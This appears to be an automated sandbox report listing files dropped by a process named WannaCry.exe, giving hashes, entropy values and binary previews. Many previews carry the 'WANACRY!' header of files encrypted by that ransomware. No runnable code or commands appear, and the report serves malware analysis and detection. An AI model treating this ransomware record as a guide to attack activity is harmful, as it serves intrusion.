                                                                              Preview:....C....c.N6..:?.A.....v.._{.1a..r......b...A..U.....x`.......%.$....$...z....Qu4.<.i|.O....b%.....p.C.B.4..C..!...d.f-..+.6..>.S..B^V.Of63..7B.SA..j.....W.M..&......(......<..RZ.-}.,..'h~..9.+nm..r..b...c.`.....t....E;....qY..I....Hx.K+p......@[t.(t.:x?xa..% '..O..h...e`Y@.....w..$..bT....p./....NW#.1.vD..{..~...........I.D....)^..K6...0.h...L1+.snH..8.....Z.....J&.qB9.-.cc..(E....../. ...:q0..,..v.SC..........v.8a.....,R...<.v.SS\.Nn.b`...3....r...SMe... N1.f.&.Kn.8a......3..Z..F.....|..Uo.E..y.d=4.-....vA./%..r......^..%*......!.:.l..5..f..6X.Z.m.;o..,J.T.C.;..xOO......D=.....x...e'mh]....[.tIvC.T..`....%..A=..4.L...K.{['a.W..&.p.9?."9wz.SW:..3JGc..).R*....d'}.!n.x..O.-..^......M......O.z...w}=....u....Cf..N...i.8.Ua..2.D"..X..NaUh....y...[......E,./..za..;*...(......#k.I........ar-...r.....fg....^....J..a.nD.!..h..y.A..L......&..y^9....<...a....;..z.....o.,..?..-...-..My..{.T$....I.Z..tS.6.R.....)_.O.R3..)|..!....$M...uN..A..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.847442911301679
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkDHSQF4BsK+81u8AM/E9MomEWZvnWRon+zJ4jQzmraXY2PGuKQmMNL2s:bkWJLZk1C7EWvnWRdFTzmOXYNuKD0t
                                                                              MD5:DA2F5A808C178E17DC51D59B26879DF7
                                                                              SHA1:56047D7B1684597C7AE38A228A0B9093DAB7A657
                                                                              SHA-256:19928598B368B3208FF5B85048EA06A66451A077FFE4B0CC43172839A2FDFD43
                                                                              SHA-512:D2F82B0EDAFA978C5D46D3B7CA48BD35BA2DD68E7CF5926DB3EDFF7A6E3BCBD5370FF9B1E820D8E9FB32D9EDD946E3987889023D2B6C13922717C6BB489C1104
                                                                              Malicious:false
                                                                              Preview:WANACRY!....$.<0.GR..q..B..=.4%.N.........e...iw.z.sk.{.-.:h.x.}|.(.J._.g..m...].)..]..X......H.F....?.....C.~unv./6.:!...$0..'.:av.f.2.d.yw.X8V...U...x.(.. ....s9....K..L./..~.1...!rg.y..Qu..z...s...C...C.k....w..`U4.....+`....*...ur...H..........O..K..................L..4.9..n.....1y.Z.ydv9../......S..Q..+..);$Q+.."I......)../2.|........a.."..H...u.PV.B.,..@lG...g.]8.;%.......!C..K.gz.2..n.R.A*..B..h..6<..W..._g...3..?kIR....}.7.....U#c{.'%.....!.L_..,E..I9.#.../..<......w5.f...u!{d.!^.b"...:;{..F.....<..?...t..[. E.(.].[..}D`s...7...l.\F]"?...v....#...-.@O#........p&...7z....W..'.4..k4....e......\.1...<<..M..&k.6.5..!Q....YL.l.q.z.../....._b^....S..Fl.....$w...P..r...]+.M.......ID..8.}H.Z2K.^.Ymv..!rv.Y..g9...+B.b.[.....(.p5.l%.?..-....L.\*......u^G..._..K/i.}6...B~.+kfR...@.~U....X..'..K.ow........+.M.Fk.y..:5I.b\.............G\.D.?J9...y/...........'Z..x.r..<~Q.4..b..~.O...}..L..........Op.e....p........A..m.(zL.......u..BtZ..}.F.:R
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.847442911301679
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkDHSQF4BsK+81u8AM/E9MomEWZvnWRon+zJ4jQzmraXY2PGuKQmMNL2s:bkWJLZk1C7EWvnWRdFTzmOXYNuKD0t
                                                                              MD5:DA2F5A808C178E17DC51D59B26879DF7
                                                                              SHA1:56047D7B1684597C7AE38A228A0B9093DAB7A657
                                                                              SHA-256:19928598B368B3208FF5B85048EA06A66451A077FFE4B0CC43172839A2FDFD43
                                                                              SHA-512:D2F82B0EDAFA978C5D46D3B7CA48BD35BA2DD68E7CF5926DB3EDFF7A6E3BCBD5370FF9B1E820D8E9FB32D9EDD946E3987889023D2B6C13922717C6BB489C1104
                                                                              Malicious:false
                                                                              Preview:WANACRY!....$.<0.GR..q..B..=.4%.N.........e...iw.z.sk.{.-.:h.x.}|.(.J._.g..m...].)..]..X......H.F....?.....C.~unv./6.:!...$0..'.:av.f.2.d.yw.X8V...U...x.(.. ....s9....K..L./..~.1...!rg.y..Qu..z...s...C...C.k....w..`U4.....+`....*...ur...H..........O..K..................L..4.9..n.....1y.Z.ydv9../......S..Q..+..);$Q+.."I......)../2.|........a.."..H...u.PV.B.,..@lG...g.]8.;%.......!C..K.gz.2..n.R.A*..B..h..6<..W..._g...3..?kIR....}.7.....U#c{.'%.....!.L_..,E..I9.#.../..<......w5.f...u!{d.!^.b"...:;{..F.....<..?...t..[. E.(.].[..}D`s...7...l.\F]"?...v....#...-.@O#........p&...7z....W..'.4..k4....e......\.1...<<..M..&k.6.5..!Q....YL.l.q.z.../....._b^....S..Fl.....$w...P..r...]+.M.......ID..8.}H.Z2K.^.Ymv..!rv.Y..g9...+B.b.[.....(.p5.l%.?..-....L.\*......u^G..._..K/i.}6...B~.+kfR...@.~U....X..'..K.ow........+.M.Fk.y..:5I.b\.............G\.D.?J9...y/...........'Z..x.r..<~Q.4..b..~.O...}..L..........Op.e....p........A..m.(zL.......u..BtZ..}.F.:R
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.805002539785193
                                                                              Encrypted:false
                                                                              SSDEEP:24:E2DSD49XCZNnnoe/zJjDBMcqHtUu90mxnrDEMbNYFaX:eNnrTGNUuP5WAX
                                                                              MD5:653319EA89549A13FAFBDE461E79C50E
                                                                              SHA1:7093BA72C82C0B9A96087E75112DFE0FBD8EE375
                                                                              SHA-256:0F63CC5FCBD18C714F70A792BA88E40F7F49C219B8A9B5A601B81AFC882107EF
                                                                              SHA-512:FB23EB5EAFF4C53FD44F5B56E73A7C4D43C89E63E799F70AADB768CB86BA389FC09D924A94C0D172C143BE5F2E7E10C54F1B7A818F7DA5274A1EDDCC119296F6
                                                                              Malicious:false
                                                                              Preview:......../...-`d.@........~.f....r..zD.6v.iO.......t.?@...P..|..)f..`^N....6..ti....z.d..e.......=b.O......q...j]r..Y....F.$....=......\.z.4.{....L.<1Z.D1.&.l..kl..K...\.yz.N..3.....OM.....+....p".Z[.Zc..M.'......s....x&.\t}&+..x...Q....i..\...\.2...?.+...5......w.....9..j(%..~0..A.+......5.v.!*.Ezv.:....R.i...j. [`..{.$......Z@fbXX....,.]......3.z.z.t.S.=...:......._..J}......@.I_a.&WY0.x...FQ....s...s...j...5...Lt.k..../F3)....&#.c/..|GE........7...YG.p^.U..ZIe.)u.p.>-\...Ul.U^~h...EV.s....LjA.GYj......X.).....+.....8.]?....ou....7.z..,.B..T>....>.M.p..x...8o.....'`.N..4.KL..WS.d*....kr.O.&5F.~....%."vK_6F.S0K.=m.U.H...m..<...*>.|..(.(/..K):...$.!.....[j7..V....V.K .F..A..v.......#..k.e.[M.P...e.,...=.._.q.....Y.#]Q..E...p..f#W....T.7.5k..?.$i*....B&[...{....-..........3/.c..P....x...-'.:.m#FI.P.R.s..t...X..a..,L.us...k.k.....?..X...\..]i....N..W.{(...|kH..%{^.X.F.....K..W.D....#S...M.57..P..<Y.+....."R..c...m...L...6~....xp..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8439849341097965
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkPMd2AVRJk3IqdRczFJOPlkORzMjV5QxtYMBMYcKMUF0KTOdFSgYJPzhuhiVVF2:bkPMd2aTk4xzgAT0YMMUF3OfSTPzhWi2
                                                                              MD5:5D3CD204B1E318D45E9957EEB930E191
                                                                              SHA1:E6FC86600109AA5660659839B20D32C3531D6B24
                                                                              SHA-256:FAA926F83B4D261C7D0C6364DF3653D0DE91E9251D731F78E15ACD4CB4A28F4A
                                                                              SHA-512:6F5399D44D1E0F48AC9FC18309816A66F18390BAE827FB8766222ABF24198943D7AE13361A1B2D29567047344F573D7378E155475C0BE5EA9CBB98D83FA603F2
                                                                              Malicious:false
                                                                              Preview:WANACRY!....".y~r.~.M../J...f.F........}.<fm.M..5o....]5Z5^)...]!...:Q...UP.w6.....N...2.q.......c..:D..)[B.|....j.L.X:..^`.U....m...lQ%...Cz^..%0....B.*Px...,..Q.e... ..{N4.;B.y....Y....r2i.-.j..B1y.y.t..b..,....=.n.-+^B...I/.6..k.a.C......p..<.a.................L_..A.$.k. q..;R....n.9..(.D*+.....".1...P.C...m....w...c...%......e..W..p....{.x..b..r......p..RR.....Hy&.[( /{..W...W.Y).b..c.....|........NH....=;d........j..'.X.@/.).G.?.......K8I.~.w......a...].s....3I.s..\5e.......X...V...ns.g...._..}..t..zFm....Wm....&..b.....c..6..Qz.21.T..U.?...u....w...G2&..1w..}.1......f`...qp....15vu......>aE.@...#Q.(FO<..&+....Z..aP..$,..d7p...,.S.C...\J...%'y....................y.|[.*.)z....p4...m8..Yx.[..!.nU.;7.8P..c.....C<.....Mu..}<.6.z.@.......b...R....75h..]a...<7.1...u. f....8.Z..WmW3>......a...S.G...._9.d.`G.3/rB.Uh....%...IA..!....E'...k1..p.2.9.4,..'..............3.{.&..K.j.....,U..H...Xk/Vb.J....q...d...1.....z..r.N&P.d..WB....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8439849341097965
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkPMd2AVRJk3IqdRczFJOPlkORzMjV5QxtYMBMYcKMUF0KTOdFSgYJPzhuhiVVF2:bkPMd2aTk4xzgAT0YMMUF3OfSTPzhWi2
                                                                              MD5:5D3CD204B1E318D45E9957EEB930E191
                                                                              SHA1:E6FC86600109AA5660659839B20D32C3531D6B24
                                                                              SHA-256:FAA926F83B4D261C7D0C6364DF3653D0DE91E9251D731F78E15ACD4CB4A28F4A
                                                                              SHA-512:6F5399D44D1E0F48AC9FC18309816A66F18390BAE827FB8766222ABF24198943D7AE13361A1B2D29567047344F573D7378E155475C0BE5EA9CBB98D83FA603F2
                                                                              Malicious:false
                                                                              Preview:WANACRY!....".y~r.~.M../J...f.F........}.<fm.M..5o....]5Z5^)...]!...:Q...UP.w6.....N...2.q.......c..:D..)[B.|....j.L.X:..^`.U....m...lQ%...Cz^..%0....B.*Px...,..Q.e... ..{N4.;B.y....Y....r2i.-.j..B1y.y.t..b..,....=.n.-+^B...I/.6..k.a.C......p..<.a.................L_..A.$.k. q..;R....n.9..(.D*+.....".1...P.C...m....w...c...%......e..W..p....{.x..b..r......p..RR.....Hy&.[( /{..W...W.Y).b..c.....|........NH....=;d........j..'.X.@/.).G.?.......K8I.~.w......a...].s....3I.s..\5e.......X...V...ns.g...._..}..t..zFm....Wm....&..b.....c..6..Qz.21.T..U.?...u....w...G2&..1w..}.1......f`...qp....15vu......>aE.@...#Q.(FO<..&+....Z..aP..$,..d7p...,.S.C...\J...%'y....................y.|[.*.)z....p4...m8..Yx.[..!.nU.;7.8P..c.....C<.....Mu..}<.6.z.@.......b...R....75h..]a...<7.1...u. f....8.Z..WmW3>......a...S.G...._9.d.`G.3/rB.Uh....%...IA..!....E'...k1..p.2.9.4,..'..............3.{.&..K.j.....,U..H...Xk/Vb.J....q...d...1.....z..r.N&P.d..WB....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.845656626699939
                                                                              Encrypted:false
                                                                              SSDEEP:24:rxJ9RRBKEMg1VZpUuZG7o9tA2smxAa7BjWT+w+gcq5eEv+0n3k0px:rfTGKmoG7mthtxAa7t/wNcOrTx
                                                                              MD5:68EE158305A5CBDA772CACD1DD632034
                                                                              SHA1:2BEC29AB7D9CCC1C4737C6B70FF2E59F69BAF373
                                                                              SHA-256:D531156E19C3D33A568647147A68424A0DD52809A3A0874A839DFAAC3A18105A
                                                                              SHA-512:DFD32EF1BDFACA69C29FACA31609CC8E9D2DA18A34CC418DB0441F66AD4F3E88B9B816D32E4EFA18F5369E2600A68D4520546692541733E69B4CBE18CF616CC6
                                                                              Malicious:false
                                                                              Preview:.~|.v:....jP....kg.H.......3-..{.C..Q.....=xv.Xrz.[+..t.J>*2.E._.8.M..=&{{.J...L-1z....@.>h.Q!...c......?.Ng......;.tk{.....Y...D.K.e...]...b.{.v...~.......4...S+E.*Xh..07c.p2.I.b.........x..~jjbZ..Fd..:i.S.r.zX..j.iJ.../B3.x.7....?.R.......$vQ}.......O..6b.....[.r.}.?......11lu(&.....7Y.Xk.7..4...cP..#..v...I..ZZLy.....?..G.....p."..A{m..7WC.g.&..E.......7..U.k....;1...A...<.#....3.2......."y~r...0[..<..e.9h..<..f...z...]....m.[0.........XS.A&..DO.>n:....g..n4O......r....-......pR...m..+H!..I}CX.y......!.......B."..e.V.%...G....o.U......x4..).l..l%#.]c..KqyfJ.....4n..V.&7.......@...Td\.<..:8..@..{..F.\.t.E2c...s........vlq....k.....n..A.;..m3,........i.........(.....W.[.w......H..'.y..&=..X(8....v...gx.dO.lA........B@d.[......4...De...*oyD4.k........).Z$,9.|...*.v."C.......[....*P....AERL..\.0..!..U^6..Y.Lo../\..L..O.e....s...n....,?..zA..P......qY.......D..T.h.m.7..^#.R.4vK9L!.........{..{..a.....)...$....}..KfM...D...;...M.H%C.....N
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.853410111035702
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkDSyXonlCha9ikbySx7HOa2WyiCI3QO8dmZrwBTwGxwgAhF3H5krZoF38USF:bkOyY0ha992Sx7HOdi33QOjQ8P75ktiA
                                                                              MD5:0D201B362F3486FD529E173BE5E0EDF0
                                                                              SHA1:E5FEA6C09633945B212EBDF97FC80188496CEF88
                                                                              SHA-256:3130E2108BDD8BD41D25DC6137F3BCF9F3201C76DD5933D46E7B5D115686E297
                                                                              SHA-512:D2152A917148CD9768FD7B5A1BF5E08B6B99C280B0FD68BA6EED6A5B7EB2844D3CE19F00AD434455569EB41219E764038DFB580680EB8FD8DC0E367DAA333CF4
                                                                              Malicious:false
                                                                              Preview:WANACRY!....H....F=.....R..'rx......-...F.3....r..R9..).....Vw.'..^..._....w..>'g.:....C......!...?......3..w...k............EW2,....$..... ...O....k{.T:9Lo...x.]...L..|.....u......}..dt.wb........4.".$....K.I(bF#.)i..e...~\..~..!d|.<P..<.\{...q.o..D...............b.hG.....T\.E....*E..-..b.....(._..."..l.>.k~&.7k!H.8g%..Xw.x.......xR:..y..^....l.7....k..L.....es.U=..s./.:..@~sD...'y...`..tc)..@...yr.S.}....j..AF=j.7..X.^\j:.N.$4TA.1Ee...gu..$,.W~.xh.0k..y|.]..Y.]P Y...D.&{[Zr...L._\k..#.m.zb7....../.m..6=.2i....9k...Co...o..].v.....7X?.C3"....M._.z~p..M.@...,.U..+...77.......l.*.x1.....Z..?.....~..(.UPD..p^u.1.Y.'.jX...98*...j.....5]...|)%u..wU^E.Q3..{5|.......'..E8.$!......Z..v....p...z.0...H..0*..x.....ng...........5E....G.Y..p+...T...}.....T1.M.Q.>..V........AF.'.O.......S.. ..U....My.M../>...@$!I..^....jwf.....Q..XG.............G.l.87...:..#.2.d..%.4...zV.R,......\.+ii....XLL.!_.......&....../g..(.e..G.q....U.E.!...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.853410111035702
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkDSyXonlCha9ikbySx7HOa2WyiCI3QO8dmZrwBTwGxwgAhF3H5krZoF38USF:bkOyY0ha992Sx7HOdi33QOjQ8P75ktiA
                                                                              MD5:0D201B362F3486FD529E173BE5E0EDF0
                                                                              SHA1:E5FEA6C09633945B212EBDF97FC80188496CEF88
                                                                              SHA-256:3130E2108BDD8BD41D25DC6137F3BCF9F3201C76DD5933D46E7B5D115686E297
                                                                              SHA-512:D2152A917148CD9768FD7B5A1BF5E08B6B99C280B0FD68BA6EED6A5B7EB2844D3CE19F00AD434455569EB41219E764038DFB580680EB8FD8DC0E367DAA333CF4
                                                                              Malicious:false
                                                                              Preview:WANACRY!....H....F=.....R..'rx......-...F.3....r..R9..).....Vw.'..^..._....w..>'g.:....C......!...?......3..w...k............EW2,....$..... ...O....k{.T:9Lo...x.]...L..|.....u......}..dt.wb........4.".$....K.I(bF#.)i..e...~\..~..!d|.<P..<.\{...q.o..D...............b.hG.....T\.E....*E..-..b.....(._..."..l.>.k~&.7k!H.8g%..Xw.x.......xR:..y..^....l.7....k..L.....es.U=..s./.:..@~sD...'y...`..tc)..@...yr.S.}....j..AF=j.7..X.^\j:.N.$4TA.1Ee...gu..$,.W~.xh.0k..y|.]..Y.]P Y...D.&{[Zr...L._\k..#.m.zb7....../.m..6=.2i....9k...Co...o..].v.....7X?.C3"....M._.z~p..M.@...,.U..+...77.......l.*.x1.....Z..?.....~..(.UPD..p^u.1.Y.'.jX...98*...j.....5]...|)%u..wU^E.Q3..{5|.......'..E8.$!......Z..v....p...z.0...H..0*..x.....ng...........5E....G.Y..p+...T...}.....T1.M.Q.>..V........AF.'.O.......S.. ..U....My.M../>...@$!I..^....jwf.....Q..XG.............G.l.87...:..#.2.d..%.4...zV.R,......\.+ii....XLL.!_.......&....../g..(.e..G.q....U.E.!...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.838674865824399
                                                                              Encrypted:false
                                                                              SSDEEP:24:9nAPl6Xqh9jmhNOO1aamOQWcfGlTD6ON/PYUtk5qmZoEZaS:9nADnSMORm08wiM3YUsRZoy
                                                                              MD5:DCE58699478379034555985310D6887A
                                                                              SHA1:3A429C1DC26639C8980C6BD78075FADDE9B13EFA
                                                                              SHA-256:A268B9EAB7170E5D5EB6CF4E463732788BB723171CAA3C3042AC65D65562E872
                                                                              SHA-512:7A5C9780142C09C1F52CD70BD66A9B5C47A70F065575F827595BA44A6440CDCD5794D5EF43059A593863200A95A0C5AFC1822FAD422817369F3C31CE7B31B3AA
                                                                              Malicious:false
                                                                              Preview:v0{m$).<W....D.u...4.....!.....WU.G...na...i....R..U.+.Epd{Yeif...Q....0-..-....4...w.O.J......U....._..;...Yj.ba..J!...c....R.[.^......gB1.7....dYj..6.._.t....k.2.;.8....rnz....L..FQu..&.*...&...N.....E.b[..j(.....MU../....oL.Y......W2.o....(.....5.=.l..............e.m.l......B..6s......w..q.....w.C...#.b.......J.....L..........}.t.G..>.>u...iQJ../.8c"y.*..0..#.8~....]A.N4!.........>....>.F..{&..Wt..Za.V.K.2..j...N.W.....+...E..a.(h5.>.@.zM...l...!./..# #>.g...|.>.(..bKI....|.1.dV.(Y......W....C.....r0.@/.%.>f....a....N.K.....p..+V........fl..;.A......e.m2....O..:.O..#....]......w....X.....x........=.t.xx+..f..u)....M@ .PaK.4......F".<.....$...a..!'..2.."w.4U5;..<.%..d.P..moc.......7...%..2'.fF.D..}X....F...?m.[.z.......o.0..)t9_w1.........#.bF.v..B..|.0.....h.P8..(G.../<.sued..@.......Z.4D...B. ..L...].nR...'..4I.Kg.k-.q....,.g...r...M.78..6.m...5..-.^+lN..z.Y..M...Z Z_XF....F..$..72.)......i......?.5F..I..|.|*7.(.*.:%..#..&V.....'6...n\"k...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.856049671030508
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk5KbEUlWa3avQw8uFHEeUkgYF9I8A25SJo/PoV44TJiK9mhefRpZ9:bk5Kzl3ex8uzNJ9fA25uYgV449ikmhez
                                                                              MD5:40A36E1D9E614FD257C283523E7117CF
                                                                              SHA1:51FBDF463691F967311AEE23E4126EB3580066D6
                                                                              SHA-256:4088E4E6817355962C8A303CDC6D4F7E437B5E5362A6430D1EE5FCB5289D58E8
                                                                              SHA-512:A671CFE1E8BE37ADF5800C859D8B22F60BDB9D09F532F4B50FB0F4CC038C3B8D313A6A5780533D420D027285D55992B1937FF838747215D3B7299998F2A2EF43
                                                                              Malicious:false
                                                                              Preview:WANACRY!....8...Z.#..0.....mP$.....J..9...5.({i|26&I..w...Hf.UuJ.t.h..[..Q.z.).8...D...2......,_....L..#.<...._..........A..1.A...$v^..J....Xu5.....S.O.Y.K....u...-.s....!.5.WA.........?.HT..kZ.8..-...;... r9h)...M..!(3wE UF..tg..:.w.........'.P....[j}..............W..dl.....(...6.....`..?.O....}8"Z..k!..T.[.H...=.[.....m...|I[.p0[>..7.."O../rk....o.&....5:f.....2....Cq&.LIMx......+7e.h..w.42V..X.....V.(oKe.>!.;=....w....-.|....}..B.{,3C.x.........k.].2[.X.px..A&.......S..h%..lz.A..;.O_^f.|..1.9Ru&....!..._....5f.^.5.3K=..&...u..)...o:....I.fL..J..Z.m..n5.g............&....)O.Z}N.5...7,r..q<-.*p|.k..._. ..~.2.hc..]....d..u..S[.Y...Q..E.....`I.l.`....)A..SD.\kx.{.......~..7.,T.*...h..Q..u.XZd.7.5..[j,.<|.Jz8..<.[s.X.Xf...%...\w>....m9.?.C..z....q..q..O.._n.?..;H.._n>d.7KM..:.{..o...u:.. .9l...Lk..6..G.[..tJ.....^.....t..\A.bX.{..2......1.Er....xU.|..5 ...B.?...mN.....n...si}..G..f.V[.~.G..w.ue^.m;B......c[...we~.8..J....R.G..b..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.856049671030508
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk5KbEUlWa3avQw8uFHEeUkgYF9I8A25SJo/PoV44TJiK9mhefRpZ9:bk5Kzl3ex8uzNJ9fA25uYgV449ikmhez
                                                                              MD5:40A36E1D9E614FD257C283523E7117CF
                                                                              SHA1:51FBDF463691F967311AEE23E4126EB3580066D6
                                                                              SHA-256:4088E4E6817355962C8A303CDC6D4F7E437B5E5362A6430D1EE5FCB5289D58E8
                                                                              SHA-512:A671CFE1E8BE37ADF5800C859D8B22F60BDB9D09F532F4B50FB0F4CC038C3B8D313A6A5780533D420D027285D55992B1937FF838747215D3B7299998F2A2EF43
                                                                              Malicious:false
                                                                              Preview:WANACRY!....8...Z.#..0.....mP$.....J..9...5.({i|26&I..w...Hf.UuJ.t.h..[..Q.z.).8...D...2......,_....L..#.<...._..........A..1.A...$v^..J....Xu5.....S.O.Y.K....u...-.s....!.5.WA.........?.HT..kZ.8..-...;... r9h)...M..!(3wE UF..tg..:.w.........'.P....[j}..............W..dl.....(...6.....`..?.O....}8"Z..k!..T.[.H...=.[.....m...|I[.p0[>..7.."O../rk....o.&....5:f.....2....Cq&.LIMx......+7e.h..w.42V..X.....V.(oKe.>!.;=....w....-.|....}..B.{,3C.x.........k.].2[.X.px..A&.......S..h%..lz.A..;.O_^f.|..1.9Ru&....!..._....5f.^.5.3K=..&...u..)...o:....I.fL..J..Z.m..n5.g............&....)O.Z}N.5...7,r..q<-.*p|.k..._. ..~.2.hc..]....d..u..S[.Y...Q..E.....`I.l.`....)A..SD.\kx.{.......~..7.,T.*...h..Q..u.XZd.7.5..[j,.<|.Jz8..<.[s.X.Xf...%...\w>....m9.?.C..z....q..q..O.._n.?..;H.._n>d.7KM..:.{..o...u:.. .9l...Lk..6..G.[..tJ.....^.....t..\A.bX.{..2......1.Er....xU.|..5 ...B.?...mN.....n...si}..G..f.V[.~.G..w.ue^.m;B......c[...we~.8..J....R.G..b..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.802613309956123
                                                                              Encrypted:false
                                                                              SSDEEP:24:qMPYgzBHrC9/NGII7oeHTNyQqxVSsf+Tt:qMrdD7JHTNynrGTt
                                                                              MD5:C62CF48EC64C7E1A7F8B528FD6E8206D
                                                                              SHA1:2770A2685BC8B7459DDEE867CA1C21049CF6A49B
                                                                              SHA-256:519879BD733EE847328C729C80FC65C83ABABBA693E0C16BC123704881345D0A
                                                                              SHA-512:912128ECA342377E6009DFC760AA9277800873973A12ADD78CBC1E91F7A6E9C0AE445FD0F2AEE03DE6BA5BED53832A7E7336AF3681524D856B5BAFE5CA9185C6
                                                                              Malicious:false
                                                                              Preview:/..@._zp.q].j..m..Tk....G..AX....cr....lbG~....m{.j'...?.:.....M.q2n.&.....&Aw.T......!z.....h.U.x....4G.].......Uo.....1.q.u...&G..Gj...D..[.~".. W...!...>.6...7.e)O%.=r.Y.f.p..v....D.`V!.`q..).u..J......A....8.....~..e.*.@6.u.{7qv.....K<.Kv~3..#Z...b..Q.u.{..gp7...3D..A..R.....%.*.$......,...8.ma.f....qY.8..d.=1i.........Ec.....;}NM..w..A...i}+.@.._.F.9)e..;..........4..k^q/.\3...i>.4.8~.... .}............e/.....3..LMJ....b.GH.b(XAa....\*.A |....~..2.^CY.H@H7..c.W..#rA....\....5=li.,.7<.Q."!.-FW..'[..3.P..]lG.ypQ=\.Q....{...s$77..l.PS.a.H]{.N...&...CW6..S.f......$B.%>2jb....L.`..]....d....Q.u......Z...y.F(5.........*..t.}._..`..o3...}.4u..;Nc.....+.!....:.E...hz.. ..J.2.@A.,r.:.Ao...$!R..R.e..'...Ra..3.-FT9V.....N.....2.....m....j....,.L.!........:...O...A...^.......q$.K)....w.lo{...)V............|..n.;Q.=.5........,G$......Bk.....|Lp...mP"..R./$...c.p.x...w6...t`..!.$..c....-...wq...)8;..J%......4)..^*.$.@..L...R..m5.nw.B..EP][...Q.....)..n.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.821883279447837
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkwiAjvScnpFg71LRr8wA8lj1oxBl5bUW9ZXp0DCpsBKDa2oZ5HxbAEOXJpA:bk+vBF0b8wA8lWz4eNp0eaBK23Z5hA3y
                                                                              MD5:16F2736559872C1E7BAD1714CDA9AD1F
                                                                              SHA1:3056DD9535FDD259825C1A65D75177B1C8A425AC
                                                                              SHA-256:22AEA664B565BECA311B541B1E483D586158A38639DE9C12ED54F96FBD687BAA
                                                                              SHA-512:D36831860B7E544FEE43E11CCBAB8B8E74E0BC19BEC0F642933D5FD3E12A2861FB721C7EBA9C3B4AE6CCCF478FD752EEBB3BEA023B68EF746FE6438FAF00B5F2
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....]X...#./s.`]p.~>.W....D..7....h.C...k...3-....S.e.s..5.N...&....e......7..B.|.M.......Z...(.A9.G..)wJ....?..^.K..0$I...."..M0a......lL..G....o...:<3f.B..L...BB.O....W.......LWA..3.i.U6.`.X...u.....A.?........<.[Z.Q......m.z..v..d.gs:...|l..............C.......E.......jK..G...b.G"5.:?.k.Y....K...*.........R..B.@... ...R...d...){>'-#].&...y&......4.1....}......./.1."..pW".{.>}f$.`RB.i..nK...Ms...e..>...^I'.V..^.&......1_.l('._j....ti....t.....s..5x.t>......h,....f..ukK....Qhx...}..s..Um.....e.v......8.H.~7x.G...9..}...?.)W2X.....\.5...'W.x|..GY.#Q...r9.....e..4.=..V..}......f....@..@...YG...O..K3<.... "6.b....>0...?/.-...GK..N...;.....3.2?.Q.mQ.........t[N..p....6.S..."..U..F1sl..Y....).I..,M.....ka{N.........Z.K.o..Y...l.z-...x)M..._..`.S...(PVEf.P.p.C|,..$...L..G...3...fY..*.|9..hF.......}....<..D...KO....}.We.J.mz...)...x.._.w~..i.i~.. ..b.].=.D...u...~.K",..)..E...j..........u...`.C...D...=n6....&`:@..........u
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.821883279447837
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkwiAjvScnpFg71LRr8wA8lj1oxBl5bUW9ZXp0DCpsBKDa2oZ5HxbAEOXJpA:bk+vBF0b8wA8lWz4eNp0eaBK23Z5hA3y
                                                                              MD5:16F2736559872C1E7BAD1714CDA9AD1F
                                                                              SHA1:3056DD9535FDD259825C1A65D75177B1C8A425AC
                                                                              SHA-256:22AEA664B565BECA311B541B1E483D586158A38639DE9C12ED54F96FBD687BAA
                                                                              SHA-512:D36831860B7E544FEE43E11CCBAB8B8E74E0BC19BEC0F642933D5FD3E12A2861FB721C7EBA9C3B4AE6CCCF478FD752EEBB3BEA023B68EF746FE6438FAF00B5F2
                                                                              Malicious:false
